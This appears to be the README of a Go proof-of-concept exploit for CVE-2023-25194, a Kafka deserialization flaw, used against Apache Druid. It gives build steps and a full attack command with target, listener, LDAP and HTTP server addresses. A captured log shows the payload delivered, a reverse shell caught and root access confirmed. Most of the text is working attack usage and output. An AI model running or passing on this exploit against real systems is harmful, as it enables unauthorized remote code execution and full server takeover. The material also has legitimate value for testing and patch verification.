CVE-2023-25194 is a deserialization vulnerability affecting Apache Kafka. This go-exploit demonstrates exploiting CVE-2023-25194 against Apache Druid (which uses Kafka). This type of attack typically requires LDAP/JNDI attacker infrastructure that is normally spread across several separate tools. However, all of that is built into the go-exploit itself, so no external tooling is needed.
To build the exploit into a Docker image, simply run:
make docker
If you have a Go build environment handy, you can also just use `make`:
albinolobster@mournland:~/cve-2023-25194$ make
gofmt -d -w cve-2023-25194.go
golangci-lint run --fix cve-2023-25194.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-25194_linux-arm64 cve-2023-25194.go
albinolobster@mournland:~/cve-2023-25194$ ./build/cve-2023-25194_linux-arm64 -c -e -rhost 10.9.49.88 -lhost 10.9.49.69 -lport 1270 -ldapAddr 10.9.49.69 -httpAddr 10.9.49.69
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting listener on 10.9.49.69:1270"
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.88 port=8888 ssl=false "ssl auto"=false
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.88 port=8888
time=2024-03-15T16:02:31.268-04:00 level=VERSION msg="The self-reported version is: 25.0.0" host=10.9.49.88 port=8888 version=25.0.0
time=2024-03-15T16:02:31.268-04:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8888 vulnerable=yes
time=2024-03-15T16:02:31.268-04:00 level=STATUS msg="Starting LDAP server on 10.9.49.69:10389"
time=2024-03-15T16:02:33.271-04:00 level=STATUS msg="Starting HTTP Server on 10.9.49.69:8080"
time=2024-03-15T16:02:33.335-04:00 level=SUCCESS msg="Received a bind request!"
time=2024-03-15T16:02:33.343-04:00 level=SUCCESS msg="Serialized payload sent!"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit completed"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit successfully completed" exploited=true
time=2024-03-15T16:02:33.640-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.88:58928"
time=2024-03-15T16:02:33.640-04:00 level=STATUS msg="Active shell from 10.9.49.88:58928"
bash: cannot set terminal process group (41): Inappropriate ioctl for device
bash: no job control in this shell
root@8e8d1ce79210:/opt/druid# id
id
uid=0(root) gid=0(root) groups=0(root)
root@8e8d1ce79210:/opt/druid#